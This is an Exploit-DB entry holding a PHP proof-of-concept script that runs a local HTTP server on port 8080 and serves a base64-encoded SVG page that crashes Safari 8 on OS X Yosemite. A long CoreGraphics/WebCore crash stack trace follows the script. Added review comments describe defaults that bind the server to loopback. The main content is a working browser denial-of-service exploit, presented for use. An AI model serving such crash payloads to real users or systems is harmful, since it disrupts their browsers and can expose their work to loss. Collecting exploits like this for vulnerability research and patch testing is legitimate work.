- EDB-ID
- 37386
- Проверка EDB
-
- Пройдено
- Автор
- MOHAMMAD REZA ESPARGHAM
- Тип уязвимости
- DOS
- Платформа
- OSX
- CVE
- N/A
- Дата публикации
- 2015-06-26
Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)
PHP:
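#!/usr/bin/php
<?php
# Title : Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of Concept
# Product Website: https://www.apple.com/safari/
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
# Usage :
# php poc.php [bind-address]
# Open Safari and open ip:8080 / 127.0.0.1:8080
# Crashed ;)
#
# What the script does: it runs a minimal single-threaded HTTP server on TCP
# port 8080 and answers every connection with one fixed HTML document (kept
# base64-encoded in $msg). Rendering that document is what trips the
# CoreGraphics assertion recorded in the crash report comment below.
#
# Review notes (differences from the original listing):
#  - The listener binds to 127.0.0.1 by default instead of every interface
#    (the original passed 0); pass an address as the first argument to expose
#    it deliberately.
#  - socket_bind()/socket_listen() failures abort instead of leaving the accept
#    loop spinning forever on a socket that never listened.
#  - Each accepted client socket is drained and closed after the response is
#    written; the original leaked one descriptor per connection.

#Main POC Code
# Bind address: loopback unless overridden on the command line.
$host = isset($argv[1]) ? $argv[1] : '127.0.0.1';
$port = 8080;

$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, $host, $port)
    or die('Failed to bind ' . $host . ':' . $port . ': ' . socket_strerror(socket_last_error($reza)));
socket_listen($reza)
    or die('Failed to listen: ' . socket_strerror(socket_last_error($reza)));
print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";

# Base64 of the HTML document served to the browser (an <svg> with a <polyline>
# and a percentage padding-top rule); decoded once, up front.
$msg =
'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
$msgd = base64_decode($msg);

# The response never changes, so build it once instead of per connection.
$response = "HTTP/1.1 200 OK\r\n" .
    "Content-length: " . strlen($msgd) . "\r\n" .
    "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
    $msgd;

# Serve forever: one response per connection. The request line is read only to
# drain it; its contents are ignored and the same document is returned for
# every path.
for (;;) {
    if ($client = @socket_accept($reza)) {
        # Drain the request first: closing a socket that still holds unread
        # input makes the kernel send a TCP reset, which can make the browser
        # discard the response instead of rendering it.
        @socket_read($client, 8192);
        socket_write($client, $response);
        socket_close($client);  # release the descriptor; the original never did
    } else {
        usleep(100000);
    }
}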
#Crash Report
/*
Process Model:
Multiple Web Processes
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_kernel.dylib 0x00007fff8e628286 __pthread_kill +
10
1 libsystem_c.dylib 0x00007fff90619b53 abort + 129
2 libsystem_c.dylib 0x00007fff905e1c39 __assert_rtn + 321
3 com.apple.CoreGraphics 0x00007fff87716e4e
CGPathCreateMutableCopyByTransformingPath + 242
4 com.apple.CoreGraphics 0x00007fff8773aff0 CGContextAddPath +
93
5 com.apple.WebCore 0x0000000104ea8c84
WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6 com.apple.WebCore 0x000000010597e851
WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&,
WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*,
WebCore::RenderSVGShape const*) + 65
7 com.apple.WebCore 0x000000010597f08a
WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&,
WebCore::GraphicsContext*) + 122
8 com.apple.WebCore 0x000000010597f3c3
WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
9 com.apple.WebCore 0x0000000104fa73cb
WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 379
10 com.apple.WebCore 0x0000000104fa7062
WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 1330
11 com.apple.WebCore 0x0000000104f1ee72
WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 722
12 com.apple.WebCore 0x0000000105429e88
WebCore::InlineElementBox::paint(WebCore::PaintInfo&,
WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) +
312
13 com.apple.WebCore 0x0000000104ea4a63
WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
14 com.apple.WebCore 0x0000000104ea4509
WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
15 com.apple.WebCore 0x0000000104e53d96
WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*,
WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
16 com.apple.WebCore 0x0000000104e51373
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 67
17 com.apple.WebCore 0x0000000104e50724
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 420
18 com.apple.WebCore 0x0000000104e529af
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 287
19 com.apple.WebCore 0x00000001058db139
WebCore::RenderBlock::paintChild(WebCore::RenderBox&,
WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&,
bool) + 393
20 com.apple.WebCore 0x0000000104e51478
WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&,
WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
21 com.apple.WebCore 0x0000000104e51420
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 240
22 com.apple.WebCore 0x0000000104e50724
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 420
23 com.apple.WebCore 0x0000000104e529af
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 287
24 com.apple.WebCore 0x0000000104e512b2
WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase,
WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&,
WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo
const&, unsigned int, WebCore::RenderObject*) + 370
25 com.apple.WebCore 0x0000000104e50f87
WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment,
1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*,
WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int,
WebCore::RenderObject*, bool, bool) + 423
26 com.apple.WebCore 0x0000000104e4fc30
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
27 com.apple.WebCore 0x0000000104e4f002
WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
28 com.apple.WebCore 0x0000000104e4fd62
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
29 com.apple.WebCore 0x0000000104e7ac36
WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer
const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned
int, unsigned int) + 358
30 com.apple.WebCore 0x000000010593757f
WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer
const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect
const&) + 799
31 com.apple.WebCore 0x000000010537dd44
WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&,
WebCore::FloatRect const&) + 132
32 com.apple.WebCore 0x00000001058b6ad9
WebCore::PlatformCALayer::drawLayerContents(CGContext*,
WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul,
WTF::CrashOnOverflow>&) + 361
33 com.apple.WebCore 0x0000000105b170a7
WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*,
WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
34 com.apple.WebCore 0x0000000105ba36cc -[WebSimpleLayer
drawInContext:] + 172
35 com.apple.QuartzCore 0x00007fff8d7033c7
CABackingStoreUpdate_ + 3306
36 com.apple.QuartzCore 0x00007fff8d7026d7
___ZN2CA5Layer8display_Ev_block_invoke + 59
37 com.apple.QuartzCore 0x00007fff8d702694
x_blame_allocations + 81
38 com.apple.QuartzCore 0x00007fff8d6f643c
CA::Layer::display_() + 1546
39 com.apple.WebCore 0x0000000105ba35eb -[WebSimpleLayer
display] + 43
40 com.apple.QuartzCore 0x00007fff8d6f47fd
CA::Layer::display_if_needed(CA::Transaction*) + 603
41 com.apple.QuartzCore 0x00007fff8d6f3e81
CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
42 com.apple.QuartzCore 0x00007fff8d6f3612
CA::Context::commit_transaction(CA::Transaction*) + 242
43 com.apple.QuartzCore 0x00007fff8d6f33ae
CA::Transaction::commit() + 390
44 com.apple.QuartzCore 0x00007fff8d701f19
CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long,
void*) + 71
45 com.apple.CoreFoundation 0x00007fff869f7127
__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
46 com.apple.CoreFoundation 0x00007fff869f7080
__CFRunLoopDoObservers + 368
47 com.apple.CoreFoundation 0x00007fff869e8bf8
CFRunLoopRunSpecific + 328
48 com.apple.HIToolbox 0x00007fff8df1156f
RunCurrentEventLoopInMode + 235
49 com.apple.HIToolbox 0x00007fff8df112ea
ReceiveNextEventCommon + 431
50 com.apple.HIToolbox 0x00007fff8df1112b
_BlockUntilNextEventMatchingListInModeWithFilter + 71
51 com.apple.AppKit 0x00007fff8ebe59bb _DPSNextEvent +
978
52 com.apple.AppKit 0x00007fff8ebe4f68 -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
53 com.apple.AppKit 0x00007fff8ebdabf3 -[NSApplication
run] + 594
54 com.apple.AppKit 0x00007fff8eb57354 NSApplicationMain
+ 1832
55 libxpc.dylib 0x00007fff8ab77958 _xpc_objc_main +
793
56 libxpc.dylib 0x00007fff8ab79060 xpc_main + 490
57 com.apple.WebKit.WebContent 0x0000000103f10b40 0x103f10000 + 2880
58 libdyld.dylib 0x00007fff873e45c9 start + 1
*/
?>